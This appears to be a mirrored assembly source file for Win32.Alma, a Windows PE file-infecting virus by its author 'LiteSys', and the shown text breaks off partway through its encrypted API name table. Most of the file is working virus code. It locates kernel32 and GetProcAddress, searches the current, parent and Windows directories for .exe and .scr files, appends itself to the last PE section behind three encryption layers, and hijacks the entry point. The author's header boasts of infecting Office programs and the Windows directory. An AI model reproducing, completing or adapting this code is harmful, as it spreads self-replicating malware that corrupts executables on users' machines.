mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-21 10:56:10 +00:00
1126 lines
34 KiB
NASM
1126 lines
34 KiB
NASM
; ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
|
|
; Ä< Win32.Alma >Ä
|
|
; Designed by LiteSys
|
|
;
|
|
; This is the second variant of a virus I wrote approximately three months
|
|
; ago,it was my second PE infector. The virus itself had nothing special
|
|
; beyond it's size: 37kb because it's payload used to drop an MP3, play it
|
|
; and drop a com file saying stupid things. It had 8-bits XOR encryption,
|
|
; direct action with backwards directory navigation and slow as hell,
|
|
; personally I think it was my worst virus so far.
|
|
;
|
|
; I decided to give a try on some stuff I learned and I thought that writing
|
|
; another virus would really be boring because I had to do things i've
|
|
; done before and that's obviously boring ;D. I thought about a variant and
|
|
; i chosen this virus. So I decided to strip the MP3 and the COM files and
|
|
; began giving it "a better life" (hoho).
|
|
;
|
|
; What can I say? this virus has three decryptors:
|
|
;
|
|
; .--------------------.
|
|
; | DECRYPTOR #1 |--.
|
|
; |--------------------| |
|
|
; .->| CALL DECRYPTOR #3 | |
|
|
; | |--------------------| |
|
|
; | | VIRUS CODE | |
|
|
; | |--------------------| |
|
|
; `--| DECRYPTOR #2 |<-'
|
|
; `--------------------'
|
|
;
|
|
; DECRYPTOR #1: 8-bits SUB/ADD with variable sliding key.
|
|
; DECRYPTOR #2: 96-bits XOR/XOR + ADD/SUB + SUB/ADD decryptor.
|
|
; DECRYPTOR #3: 8-bits XOR with static key. Used to decrypt the data.
|
|
;
|
|
; Really I think this virus needs a poly engine and EPO features, but I
|
|
; don't have any time to code, so here it is, easily detectable =).
|
|
;
|
|
; By the way, this is my most stable virus =D. I tried to infect WinWord,
|
|
; Excel, PowerPoint and Outlook and everything went ok, also I infected
|
|
; everything I had in the Windows directory and it was ok too.
|
|
;
|
|
; Peace,
|
|
; LiteSys
|
|
; ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
|
|
|
|
.586p
|
|
.MODEL FLAT, STDCALL
|
|
|
|
INCLUDE C:\TOOLS\TASM\INCLUDE\WIN32API.INC
|
|
INCLUDE C:\TOOLS\TASM\INCLUDE\WINDOWS.INC
|
|
|
|
EXTRN ExitProcess:PROC
|
|
EXTRN MessageBoxA:PROC
|
|
|
|
.CONST
|
|
|
|
PAGINAS EQU 50d
|
|
KERNEL_9X EQU 0BFF70000h
|
|
GPA_HARDCODE EQU 0BFF76DACh
|
|
CRLF EQU <0Dh, 0Ah>
|
|
TAMA¥O_VIRUS EQU (TERMINA_VIRUS - EMPIEZA_VIRUS)
|
|
TAMA¥O_ENCRIPTADO EQU (TERMINA_VIRUS - EMPIEZA_CRYPT)
|
|
TAMA¥O_DESENCRIPTOR EQU (EMPIEZA_CRYPT - EMPIEZA_VIRUS)
|
|
RDTSC EQU <DW 310Fh>
|
|
|
|
.DATA
|
|
|
|
MENSJE DB "Alma Virus by LiteSys", CRLF
|
|
DB "Primera Generacion", CRLF, CRLF
|
|
DB "Tamanio total del virus: "
|
|
DB TAMA¥O_VIRUS / 10000 MOD 10 + 30h
|
|
DB TAMA¥O_VIRUS / 1000 MOD 10 + 30h
|
|
DB TAMA¥O_VIRUS / 100 MOD 10 + 30h
|
|
DB TAMA¥O_VIRUS / 10 MOD 10 + 30h
|
|
DB TAMA¥O_VIRUS / 1 MOD 10 + 30h
|
|
DB 00h
|
|
TITLO DB "-= Alma =-", 00h
|
|
|
|
.CODE
|
|
|
|
Alma:
|
|
|
|
XOR EBP, EBP
|
|
JMP EMPIEZA_CRYPT
|
|
|
|
EMPIEZA_VIRUS LABEL NEAR
|
|
|
|
CALL @LA_YUCA
|
|
@ER_DERTA:
|
|
SUB EDX, OFFSET @ER_DERTA
|
|
JMP @EL_MONTE
|
|
@LA_YUCA:
|
|
POP EDX
|
|
JMP @ER_DERTA
|
|
@EL_MONTE:
|
|
XCHG EDX, EBP
|
|
|
|
MOV AL, 00h
|
|
ORG $-1
|
|
LLAVEX DB 00h
|
|
MOV ECX, TAMA¥O_ENCRIPTADO
|
|
LEA ESI, OFFSET [EBP + EMPIEZA_CRYPT]
|
|
@@DC:
|
|
ADD BYTE PTR [ESI], AL
|
|
INC ESI
|
|
DEC AL
|
|
LOOP @@DC
|
|
|
|
PUSH OFFSET EMPIEZA_CRYPT
|
|
ADD DWORD PTR [ESP], EBP
|
|
JMP @Decriptor_2
|
|
|
|
EMPIEZA_CRYPT LABEL NEAR
|
|
|
|
JMP @@1
|
|
DB " [ALMA] "
|
|
@@1:
|
|
|
|
CALL Desencriptar_Datos
|
|
|
|
MOV EDI, DWORD PTR [ESP]
|
|
|
|
CALL Seh_Handler
|
|
|
|
MOV ESP, DWORD PTR [ESP+8h]
|
|
JMP _REVOL
|
|
|
|
Seh_Handler:
|
|
|
|
XOR EAX, EAX
|
|
PUSH DWORD PTR FS:[EAX]
|
|
MOV FS:[EAX], ESP
|
|
|
|
CALL BUSCA_KERNEL32
|
|
MOV DWORD PTR [EBP + KERNEL32], EAX
|
|
|
|
CALL BUSCA_GPA
|
|
MOV DWORD PTR [EBP + GetProcAddress], EAX
|
|
|
|
LEA EDI, OFFSET [EBP + Tabla_APIs_KERNEL32]
|
|
LEA ESI, OFFSET [EBP + CreateFileA]
|
|
CALL BUSCA_APIs
|
|
INC EAX
|
|
JZ _REVOL
|
|
|
|
LEA EAX, OFFSET [EBP + DIR_ORIGINAL]
|
|
PUSH EAX
|
|
PUSH MAX_PATH
|
|
CALL [EBP + GetCurrentDirectoryA]
|
|
OR EAX, EAX
|
|
JZ _REVOL
|
|
|
|
Busca_Primero:
|
|
|
|
LEA EAX, OFFSET [EBP + Busqueda]
|
|
PUSH EAX
|
|
LEA EAX, OFFSET [EBP + Todo]
|
|
PUSH EAX
|
|
CALL [EBP + FindFirstFileA]
|
|
MOV DWORD PTR [EBP + SHandle], EAX
|
|
INC EAX
|
|
JZ Recupera_Directorio
|
|
DEC EAX
|
|
|
|
LaMamada:
|
|
|
|
LEA EDI, OFFSET [EBP + Busqueda.wfd_szFileName]
|
|
XOR EAX, EAX
|
|
MOV AL, "."
|
|
@@Z:
|
|
SCASB
|
|
JNZ @@Z
|
|
MOV EAX, DWORD PTR [EDI-1h]
|
|
OR EAX, 20202020h
|
|
CMP EAX, "exe."
|
|
JE Infecta_Este_Exe
|
|
CMP EAX, "rcs."
|
|
JE Infecta_Este_Exe
|
|
|
|
Busca_Proximo:
|
|
|
|
LEA EAX, OFFSET [EBP + Busqueda]
|
|
PUSH EAX
|
|
PUSH DWORD PTR [EBP + SHandle]
|
|
CALL [EBP + FindNextFileA]
|
|
OR EAX, EAX
|
|
JNZ LaMamada
|
|
|
|
PUSH DWORD PTR [EBP + SHandle]
|
|
CALL [EBP + FindClose]
|
|
|
|
LEA EAX, OFFSET [EBP + Puto_Puto]
|
|
PUSH EAX
|
|
CALL [EBP + SetCurrentDirectoryA]
|
|
OR EAX, EAX
|
|
JZ Recupera_Directorio
|
|
|
|
LEA EAX, OFFSET [EBP + Busqueda.wfd_szFileName]
|
|
PUSH EAX
|
|
PUSH MAX_PATH
|
|
CALL [EBP + GetCurrentDirectoryA]
|
|
OR EAX, EAX
|
|
JE Termina_Directa
|
|
CMP DWORD PTR [EBP + Grueso], EAX
|
|
JE Termina_Directa
|
|
MOV DWORD PTR [EBP + Grueso], EAX
|
|
|
|
JMP Busca_Primero
|
|
|
|
Termina_Directa:
|
|
|
|
CMP BYTE PTR [EBP + WinDir_Infectado], TRUE
|
|
JZ Recupera_Directorio
|
|
|
|
MOV BYTE PTR [EBP + WinDir_Infectado], TRUE
|
|
PUSH MAX_PATH
|
|
LEA EAX, OFFSET [EBP + Busqueda.wfd_szFileName]
|
|
PUSH EAX
|
|
CALL [EBP + GetWindowsDirectoryA]
|
|
OR EAX, EAX
|
|
JZ Recupera_Directorio
|
|
|
|
LEA EAX, OFFSET [EBP + Busqueda.wfd_szFileName]
|
|
PUSH EAX
|
|
CALL [EBP + SetCurrentDirectoryA]
|
|
|
|
JMP Busca_Primero
|
|
|
|
Recupera_Directorio:
|
|
|
|
LEA EAX, OFFSET [EBP + Dir_Original]
|
|
CALL [EBP + SetCurrentDirectoryA]
|
|
|
|
_REVOL:
|
|
|
|
XOR EAX, EAX
|
|
POP DWORD PTR FS:[EAX]
|
|
POP ECX
|
|
|
|
DB 068h ; PUSH
|
|
RETORNA DD OFFSET _PrimGen ; Primera Generacion
|
|
RET
|
|
|
|
Infecta_Este_Exe:
|
|
LEA EBX, OFFSET [EBP + Busqueda.wfd_szFileName]
|
|
CALL Infecta_Exe
|
|
JMP Busca_Proximo
|
|
|
|
Mi_Firma DB "[" XOR 4Eh
|
|
DB "D" XOR 4Eh
|
|
DB "e" XOR 4Eh
|
|
DB "s" XOR 4Eh
|
|
DB "i" XOR 4Eh
|
|
DB "g" XOR 4Eh
|
|
DB "n" XOR 4Eh
|
|
DB "e" XOR 4Eh
|
|
DB "d" XOR 4Eh
|
|
DB " " XOR 4Eh
|
|
DB "b" XOR 4Eh
|
|
DB "y" XOR 4Eh
|
|
DB " " XOR 4Eh
|
|
DB "L" XOR 4Eh
|
|
DB "i" XOR 4Eh
|
|
DB "t" XOR 4Eh
|
|
DB "e" XOR 4Eh
|
|
DB "S" XOR 4Eh
|
|
DB "y" XOR 4Eh
|
|
DB "s" XOR 4Eh
|
|
DB "]" XOR 4Eh
|
|
|
|
; Proceso para buscar la base del KERNEL32
|
|
;
|
|
; EDI -> llamada del stack...
|
|
|
|
BUSCA_KERNEL32 PROC
|
|
|
|
AND EDI, 0FFFF0000h
|
|
PUSH PAGINAS
|
|
POP ECX
|
|
|
|
CHEQUEA:
|
|
PUSH EDI
|
|
CMP BYTE PTR [EDI], "M"
|
|
JNE SIGUE
|
|
|
|
ADD EDI, [EDI+3Ch]
|
|
CMP BYTE PTR [EDI], "P"
|
|
JE MESMO
|
|
|
|
SIGUE:
|
|
POP EDI
|
|
SUB EDI, 1000h
|
|
LOOP CHEQUEA
|
|
|
|
PUSH KERNEL_9X
|
|
|
|
MESMO:
|
|
POP EAX
|
|
RET
|
|
|
|
BUSCA_KERNEL32 ENDP
|
|
|
|
; Funcion para Encriptar/Desencriptar los datos.
|
|
; Llave estatica.
|
|
|
|
Desencriptar_Datos:
|
|
|
|
LEA EDI, OFFSET [EBP + CRIPTA2]
|
|
MOV ECX, L_CRIPTA2
|
|
@DCR:
|
|
XOR BYTE PTR [EDI], 4Eh
|
|
INC EDI
|
|
LOOP @DCR
|
|
|
|
RET
|
|
|
|
; Proceso para buscar el handle de GetProcAddress.
|
|
; Se debe buscar primero el handle del kernel32.
|
|
|
|
BUSCA_GPA PROC
|
|
|
|
MOV EBX, DWORD PTR [EBP + KERNEL32]
|
|
MOV ESI, EBX
|
|
|
|
ADD ESI, DWORD PTR [ESI+3Ch]
|
|
MOV ESI, DWORD PTR [ESI+78h]
|
|
ADD ESI, EBX ; Obtiene tabla de exportaciones.
|
|
MOV DWORD PTR [EBP + EXPORTS], ESI
|
|
|
|
MOV ECX, DWORD PTR [ESI+18h]
|
|
DEC ECX
|
|
|
|
MOV ESI, DWORD PTR [ESI+20h]
|
|
ADD ESI, EBX
|
|
|
|
XOR EAX, EAX
|
|
|
|
BUX:
|
|
MOV EDI, DWORD PTR [ESI]
|
|
ADD EDI, EBX
|
|
PUSH ESI
|
|
|
|
LEA ESI, OFFSET [EBP + GPA]
|
|
|
|
COMP:
|
|
PUSH ECX
|
|
PUSH Largo_GPA
|
|
POP ECX
|
|
REP CMPSB
|
|
JE GPA_LISTO
|
|
|
|
POP ECX
|
|
INC EAX
|
|
POP ESI
|
|
ADD ESI, 4h
|
|
|
|
LOOP BUX
|
|
|
|
JMP ASUME_HARDCODE
|
|
|
|
GPA_LISTO:
|
|
|
|
POP ESI
|
|
POP ECX
|
|
|
|
MOV EDI, DWORD PTR [EBP + EXPORTS]
|
|
ADD EAX, EAX
|
|
|
|
MOV ESI, DWORD PTR [EDI+24h]
|
|
ADD ESI, EBX
|
|
ADD ESI, EAX
|
|
|
|
MOVZX EAX, WORD PTR [ESI]
|
|
IMUL EAX, EAX, 4h
|
|
|
|
MOV ESI, DWORD PTR [EDI+1Ch]
|
|
ADD ESI, EBX
|
|
ADD ESI, EAX
|
|
|
|
MOV EAX, DWORD PTR [ESI]
|
|
ADD EAX, EBX
|
|
|
|
RET
|
|
|
|
ASUME_HARDCODE:
|
|
|
|
PUSH GPA_HARDCODE
|
|
POP EAX
|
|
RET
|
|
|
|
BUSCA_GPA ENDP
|
|
|
|
; Proceso para buscar el handle de cada una de las
|
|
; APIs.
|
|
;
|
|
; EBX -> Modulo.
|
|
; EDI -> Cadenas de las APIs.
|
|
; ESI -> DWords para guardar las rva.
|
|
|
|
BUSCA_APIs PROC
|
|
|
|
PUSHAD
|
|
|
|
B1:
|
|
|
|
PUSH EDI
|
|
PUSH EBX
|
|
CALL [EBP + GetProcAddress]
|
|
OR EAX, EAX
|
|
JZ _ERROR_APIs
|
|
|
|
MOV DWORD PTR [ESI], EAX
|
|
ADD ESI, 4h
|
|
|
|
XOR AL, AL
|
|
REPNZ SCASB
|
|
CMP BYTE PTR [EDI], 0FFh
|
|
JNZ B1
|
|
|
|
POPAD
|
|
RET
|
|
|
|
_ERROR_APIs:
|
|
|
|
XOR EAX, EAX
|
|
DEC EAX
|
|
RET
|
|
|
|
BUSCA_APIs ENDP
|
|
|
|
; Proceso para infectar un archivo PE.
|
|
; Expande la ultima secci¢n del PE.
|
|
;
|
|
; EBX -> Puntero al archivo a infectar.
|
|
|
|
INFECTA_EXE PROC
|
|
|
|
PUSHAD
|
|
|
|
PUSH DWORD PTR [EBP + RETORNA]
|
|
POP DWORD PTR [EBP + EP_VIEJO]
|
|
|
|
XOR EAX, EAX
|
|
PUSH EAX
|
|
PUSH FILE_ATTRIBUTE_NORMAL
|
|
PUSH OPEN_EXISTING
|
|
PUSH EAX
|
|
PUSH EAX
|
|
PUSH GENERIC_READ + GENERIC_WRITE
|
|
PUSH EBX
|
|
CALL [EBP + CreateFileA]
|
|
MOV DWORD PTR [EBP + FHANDLE], EAX
|
|
INC EAX
|
|
JZ _FIN_INFEXE
|
|
DEC EAX
|
|
|
|
XOR EBX, EBX
|
|
PUSH EBX
|
|
PUSH EAX
|
|
CALL [EBP + GetFileSize]
|
|
MOV DWORD PTR [EBP + TAMA¥O], EAX
|
|
INC EAX
|
|
JZ _FIN_INFEXE
|
|
DEC EAX
|
|
ADD EAX, TAMA¥O_VIRUS+1000h
|
|
|
|
PUSH EAX
|
|
|
|
XOR EBX, EBX
|
|
PUSH EBX
|
|
PUSH EAX
|
|
PUSH EBX
|
|
PUSH PAGE_READWRITE
|
|
PUSH EBX
|
|
PUSH DWORD PTR [EBP + FHANDLE]
|
|
CALL [EBP + CreateFileMappingA]
|
|
MOV DWORD PTR [EBP + MHANDLE], EAX
|
|
OR EAX, EAX
|
|
JZ _FIN_INFEXE
|
|
|
|
POP EDX
|
|
|
|
XOR EBX, EBX
|
|
PUSH EDX
|
|
PUSH EBX
|
|
PUSH EBX
|
|
PUSH FILE_MAP_WRITE
|
|
PUSH EAX
|
|
CALL [EBP + MapViewOfFile]
|
|
MOV DWORD PTR [EBP + BASEMAP], EAX
|
|
OR EAX, EAX
|
|
JZ _TERMINADA
|
|
|
|
MOV EDI, EAX
|
|
|
|
MOV BX, WORD PTR [EDI]
|
|
XOR BX, 6666h
|
|
SUB BX, 3C2Bh ; "ZM" XOR 6666h & SUB
|
|
JNZ _TERMINADA
|
|
|
|
MOV EDX, EDI
|
|
ADD EDX, DWORD PTR [EDI+3Ch]
|
|
CMP EDX, DWORD PTR [EBP + BaseMap]
|
|
JB _TERMINADA
|
|
MOV EBX, DWORD PTR [EBP + BASEMAP]
|
|
ADD EBX, DWORD PTR [EBP + TAMA¥O]
|
|
CMP EDX, EBX
|
|
JA _TERMINADA
|
|
|
|
ADD EDI, DWORD PTR [EDI+3Ch]
|
|
MOV BX, WORD PTR [EDI]
|
|
XOR BX, 2121h
|
|
SUB BX, 6471h ; "EP" XOR 6666h & SUB
|
|
JNZ _TERMINADA
|
|
|
|
CMP DWORD PTR [EDI+4Ch], "amlA" ; "Alma" marca de infeccion.
|
|
JZ _TERMINADA
|
|
|
|
MOV DWORD PTR [EDI+4Ch], "amlA"
|
|
|
|
MOV ESI, EDI
|
|
ADD ESI, 18h
|
|
MOVZX EAX, WORD PTR [EDI+14h]
|
|
ADD ESI, EAX
|
|
|
|
XOR ECX, ECX
|
|
MOVZX ECX, WORD PTR [EDI+06h]
|
|
DEC ECX
|
|
IMUL ECX, ECX, 28h ; ultima seccion
|
|
ADD ESI, ECX
|
|
|
|
PUSH DWORD PTR [ESI+10h]
|
|
POP DWORD PTR [EBP + SRAWDATA] ; sizeofrawdata.
|
|
|
|
MOV EAX, DWORD PTR [ESI+8h]
|
|
PUSH EAX
|
|
ADD EAX, TAMA¥O_VIRUS ; ajustar
|
|
MOV DWORD PTR [ESI+8h], EAX
|
|
|
|
MOV EBX, DWORD PTR [EDI+3Ch] ; alignment.
|
|
XOR EDX, EDX
|
|
DIV EBX
|
|
|
|
INC EAX
|
|
MUL EBX
|
|
|
|
MOV DWORD PTR [ESI+10h], EAX
|
|
|
|
POP EBX
|
|
|
|
MOV EAX, DWORD PTR [EDI+28h]
|
|
ADD EAX, DWORD PTR [EDI+34h]
|
|
MOV DWORD PTR [EBP + RETORNA], EAX
|
|
|
|
ADD EBX, DWORD PTR [ESI+0Ch]
|
|
MOV DWORD PTR [EDI+28h], EBX
|
|
|
|
OR DWORD PTR [ESI+24h], 0A0000020h ; caracteristicas
|
|
|
|
MOV EAX, DWORD PTR [ESI+10h]
|
|
ADD EAX, DWORD PTR [ESI+0Ch]
|
|
MOV DWORD PTR [EDI+50h], EAX ; ImageSize.
|
|
|
|
; copiar virus...
|
|
|
|
MOV EDI, DWORD PTR [ESI+14h]
|
|
ADD EDI, DWORD PTR [ESI+8h]
|
|
PUSH TAMA¥O_VIRUS
|
|
POP ECX
|
|
SUB EDI, ECX
|
|
ADD EDI, [EBP + BASEMAP]
|
|
|
|
PUSH PAGE_READWRITE
|
|
PUSH MEM_COMMIT + MEM_RESERVE + MEM_TOP_DOWN
|
|
PUSH TAMA¥O_VIRUS + 100h
|
|
PUSH NULL
|
|
CALL [EBP + VirtualAlloc]
|
|
MOV DWORD PTR [EBP + MEMORIA], EAX
|
|
OR EAX, EAX
|
|
JZ _TERMINADA
|
|
|
|
PUSHAD
|
|
|
|
MOV EDI, EAX
|
|
LEA ESI, OFFSET [EBP + EMPIEZA_CRYPT]
|
|
MOV ECX, (@Decriptor_2 - EMPIEZA_CRYPT) / 12
|
|
|
|
RDTSC
|
|
IMUL EAX, EAX
|
|
NEG EAX
|
|
MOV DWORD PTR [EBP + LLAVE2A], EAX
|
|
PUSH EAX
|
|
|
|
RDTSC
|
|
ADC EAX, EAX
|
|
NOT EAX
|
|
MOV DWORD PTR [EBP + LLAVE2B], EAX
|
|
PUSH EAX
|
|
|
|
CALL [EBP + GetTickCount]
|
|
IMUL EAX, EAX
|
|
NOT EAX
|
|
MOV DWORD PTR [EBP + LLAVE2C], EAX
|
|
XCHG EDX, EAX
|
|
|
|
POP EBX
|
|
POP EAX
|
|
|
|
; LLAVE2A -> EAX
|
|
; LLAVE2B -> EBX
|
|
; LLAVE2C -> EDX
|
|
|
|
PUSHAD
|
|
CALL Desencriptar_Datos
|
|
POPAD
|
|
|
|
@JOJOJO:
|
|
MOVSD
|
|
MOVSD
|
|
MOVSD
|
|
XOR DWORD PTR [EDI-0Ch], EAX
|
|
ADD DWORD PTR [EDI-08h], EBX
|
|
SUB DWORD PTR [EDI-04h], EDX
|
|
LOOP @JOJOJO
|
|
|
|
PUSHAD
|
|
CALL Desencriptar_Datos
|
|
POPAD
|
|
|
|
PUSH TAMA¥O_DEC2
|
|
POP ECX
|
|
REP MOVSB
|
|
|
|
POPAD
|
|
|
|
@ReGen:
|
|
RDTSC
|
|
IMUL EAX, EAX
|
|
MOV BYTE PTR [EBP + LLAVEX], AL
|
|
OR AL, AL
|
|
JZ @ReGen
|
|
|
|
LEA ESI, OFFSET [EBP + EMPIEZA_VIRUS]
|
|
PUSH TAMA¥O_DESENCRIPTOR
|
|
POP ECX
|
|
REP MOVSB
|
|
|
|
MOV ESI, DWORD PTR [EBP + MEMORIA]
|
|
MOV ECX, TAMA¥O_ENCRIPTADO
|
|
|
|
PUSHAD
|
|
CALL Desencriptar_Datos
|
|
POPAD
|
|
|
|
@@CC:
|
|
MOVSB
|
|
SUB BYTE PTR [EDI-1h], AL
|
|
DEC AL
|
|
LOOP @@CC
|
|
|
|
PUSHAD
|
|
CALL Desencriptar_Datos
|
|
POPAD
|
|
|
|
ADD DWORD PTR [EBP + TAMA¥O], TAMA¥O_VIRUS+1000h
|
|
|
|
_TERMINADA:
|
|
|
|
PUSH DWORD PTR [EBP + BASEMAP]
|
|
CALL [EBP + UnmapViewOfFile]
|
|
|
|
PUSH DWORD PTR [EBP + MHANDLE]
|
|
CALL [EBP + CloseHandle]
|
|
|
|
XOR EBX, EBX
|
|
PUSH EBX
|
|
PUSH EBX
|
|
MOV EAX, DWORD PTR [EBP + TAMA¥O]
|
|
PUSH EAX
|
|
PUSH DWORD PTR [EBP + FHANDLE]
|
|
CALL [EBP + SetFilePointer]
|
|
|
|
PUSH DWORD PTR [EBP + FHANDLE]
|
|
CALL [EBP + SetEndOfFile]
|
|
|
|
PUSH DWORD PTR [EBP + FHANDLE]
|
|
CALL [EBP + CloseHandle]
|
|
|
|
_FIN_INFEXE:
|
|
|
|
PUSH DWORD PTR [EBP + EP_VIEJO]
|
|
POP DWORD PTR [EBP + RETORNA]
|
|
|
|
POPAD
|
|
RET
|
|
|
|
INFECTA_EXE ENDP
|
|
|
|
CRIPTA2 LABEL NEAR
|
|
|
|
Kernel32 DD 4E4E4E4Eh
|
|
GetProcAddress DD 4E4E4E4Eh
|
|
Puto_Puto DB "." XOR 4Eh
|
|
DB "." XOR 4Eh
|
|
DB 4Eh
|
|
Todo DB "*" XOR 4Eh
|
|
DB "." XOR 4Eh
|
|
DB "?" XOR 4Eh
|
|
DB "?" XOR 4Eh
|
|
DB "?" XOR 4Eh
|
|
DB 4Eh
|
|
SHandle DD 4E4E4E4Eh
|
|
Grueso DD 4E4E4E4Eh
|
|
Dir_Original DB MAX_PATH DUP (4Eh)
|
|
CreateFileA DD 4E4E4E4Eh
|
|
CreateFileMappingA DD 4E4E4E4Eh
|
|
MapViewOfFile DD 4E4E4E4Eh
|
|
UnmapViewOfFile DD 4E4E4E4Eh
|
|
CloseHandle DD 4E4E4E4Eh
|
|
FindFirstFileA DD 4E4E4E4Eh
|
|
FindNextFileA DD 4E4E4E4Eh
|
|
FindClose DD 4E4E4E4Eh
|
|
GetFileSize DD 4E4E4E4Eh
|
|
SetFilePointer DD 4E4E4E4Eh
|
|
SetEndOfFile DD 4E4E4E4Eh
|
|
GetCurrentDirectoryA DD 4E4E4E4Eh
|
|
SetCurrentDirectoryA DD 4E4E4E4Eh
|
|
GetSystemTime DD 4E4E4E4Eh
|
|
LoadLibraryA DD 4E4E4E4Eh
|
|
VirtualAlloc DD 4E4E4E4Eh
|
|
VirtualFree DD 4E4E4E4Eh
|
|
GetTickCount DD 4E4E4E4Eh
|
|
GetWindowsDirectoryA DD 4E4E4E4Eh
|
|
WinDir_Infectado DB 4Eh
|
|
MEMORIA DD 4E4E4E4Eh
|
|
FHANDLE DD 4E4E4E4Eh
|
|
MHANDLE DD 4E4E4E4Eh
|
|
BASEMAP DD 4E4E4E4Eh
|
|
TAMA¥O DD 4E4E4E4Eh
|
|
SRAWDATA DD 4E4E4E4Eh
|
|
EP_VIEJO DD 4E4E4E4Eh
|
|
EXPORTS DD 4E4E4E4Eh
|
|
GPA DB "G" XOR 4Eh
|
|
DB "e" XOR 4Eh
|
|
DB "t" XOR 4Eh
|
|
DB "P" XOR 4Eh
|
|
DB "r" XOR 4Eh
|
|
DB "o" XOR 4Eh
|
|
DB "c" XOR 4Eh
|
|
DB "A" XOR 4Eh
|
|
DB "d" XOR 4Eh
|
|
DB "d" XOR 4Eh
|
|
DB "r" XOR 4Eh
|
|
DB "e" XOR 4Eh
|
|
DB "s" XOR 4Eh
|
|
DB "s" XOR 4Eh
|
|
DB 4Eh
|
|
Largo_GPA EQU $-GPA
|
|
Busqueda DB SIZEOF_WIN32_FIND_DATA DUP (4Eh)
|
|
|
|
Tabla_APIs_KERNEL32 DB "C" XOR 4Eh
|
|
DB "r" XOR 4Eh
|
|
DB "e" XOR 4Eh
|
|
DB "a" XOR 4Eh
|
|
DB "t" XOR 4Eh
|
|
DB "e" XOR 4Eh
|
|
DB "F" XOR 4Eh
|
|
DB "i" XOR 4Eh
|
|
DB "l" XOR 4Eh
|
|
DB "e" XOR 4Eh
|
|
DB "A" XOR 4Eh
|
|
DB 4Eh
|
|
|
|
DB "C" XOR 4Eh
|
|
DB "r" XOR 4Eh
|
|
DB "e" XOR 4Eh
|
|
DB "a" XOR 4Eh
|
|
DB "t" XOR 4Eh
|
|
DB "e" XOR 4Eh
|
|
DB "F" XOR 4Eh
|
|
DB "i" XOR 4Eh
|
|
DB "l" XOR 4Eh
|
|
DB "e" XOR 4Eh
|
|
DB "M" XOR 4Eh
|
|
DB "a" XOR 4Eh
|
|
DB "p" XOR 4Eh
|
|
DB "p" XOR 4Eh
|
|
DB "i" XOR 4Eh
|
|
DB "n" XOR 4Eh
|
|
DB "g" XOR 4Eh
|
|
DB "A" XOR 4Eh
|
|
DB 4Eh
|
|
|
|
DB "M" XOR 4Eh
|
|
DB "a" XOR 4Eh
|
|
DB "p" XOR 4Eh
|
|
DB "V" XOR 4Eh
|
|
DB "i" XOR 4Eh
|
|
DB "e" XOR 4Eh
|
|
DB "w" XOR 4Eh
|
|
DB "O" XOR 4Eh
|
|
DB "f" XOR 4Eh
|
|
DB "F" XOR 4Eh
|
|
DB "i" XOR 4Eh
|
|
DB "l" XOR 4Eh
|
|
DB "e" XOR 4Eh
|
|
DB 4Eh
|
|
|
|
DB "U" XOR 4Eh
|
|
DB "n" XOR 4Eh
|
|
DB "m" XOR 4Eh
|
|
DB "a" XOR 4Eh
|
|
DB "p" XOR 4Eh
|
|
DB "V" XOR 4Eh
|
|
DB "i" XOR 4Eh
|
|
DB "e" XOR 4Eh
|
|
DB "w" XOR 4Eh
|
|
DB "O" XOR 4Eh
|
|
DB "f" XOR 4Eh
|
|
DB "F" XOR 4Eh
|
|
DB "i" XOR 4Eh
|
|
DB "l" XOR 4Eh
|
|
DB "e" XOR 4Eh
|
|
DB 4Eh
|
|
|
|
DB "C" XOR 4Eh
|
|
DB "l" XOR 4Eh
|
|
DB "o" XOR 4Eh
|
|
DB "s" XOR 4Eh
|
|
DB "e" XOR 4Eh
|
|
DB "H" XOR 4Eh
|
|
DB "a" XOR 4Eh
|
|
DB "n" XOR 4Eh
|
|
DB "d" XOR 4Eh
|
|
DB "l" XOR 4Eh
|
|
DB "e" XOR 4Eh
|
|
DB 4Eh
|
|
|
|
DB "F" XOR 4Eh
|
|
DB "i" XOR 4Eh
|
|
DB "n" XOR 4Eh
|
|
DB "d" XOR 4Eh
|
|
DB "F" XOR 4Eh
|
|
DB "i" XOR 4Eh
|
|
DB "r" XOR 4Eh
|
|
DB "s" XOR 4Eh
|
|
DB "t" XOR 4Eh
|
|
DB "F" XOR 4Eh
|
|
DB "i" XOR 4Eh
|
|
DB "l" XOR 4Eh
|
|
DB "e" XOR 4Eh
|
|
DB "A" XOR 4Eh
|
|
DB 4Eh
|
|
|
|
DB "F" XOR 4Eh
|
|
DB "i" XOR 4Eh
|
|
DB "n" XOR 4Eh
|
|
DB "d" XOR 4Eh
|
|
DB "N" XOR 4Eh
|
|
DB "e" XOR 4Eh
|
|
DB "x" XOR 4Eh
|
|
DB "t" XOR 4Eh
|
|
DB "F" XOR 4Eh
|
|
DB "i" XOR 4Eh
|
|
DB "l" XOR 4Eh
|
|
DB "e" XOR 4Eh
|
|
DB "A" XOR 4Eh
|
|
DB 4Eh
|
|
|
|
DB "F" XOR 4Eh
|
|
DB "i" XOR 4Eh
|
|
DB "n" XOR 4Eh
|
|
DB "d" XOR 4Eh
|
|
DB "C" XOR 4Eh
|
|
DB "l" XOR 4Eh
|
|
DB "o" XOR 4Eh
|
|
DB "s" XOR 4Eh
|
|
DB "e" XOR 4Eh
|
|
DB 4Eh
|
|
|
|
DB "G" XOR 4Eh
|
|
DB "e" XOR 4Eh
|
|
DB "t" XOR 4Eh
|
|
DB "F" XOR 4Eh
|
|
DB "i" XOR 4Eh
|
|
DB "l" XOR 4Eh
|
|
DB "e" XOR 4Eh
|
|
DB "S" XOR 4Eh
|
|
DB "i" XOR 4Eh
|
|
DB "z" XOR 4Eh
|
|
DB "e" XOR 4Eh
|
|
DB 4Eh
|
|
|
|
DB "S" XOR 4Eh
|
|
DB "e" XOR 4Eh
|
|
DB "t" XOR 4Eh
|
|
DB "F" XOR 4Eh
|
|
DB "i" XOR 4Eh
|
|
DB "l" XOR 4Eh
|
|
DB "e" XOR 4Eh
|
|
DB "P" XOR 4Eh
|
|
DB "o" XOR 4Eh
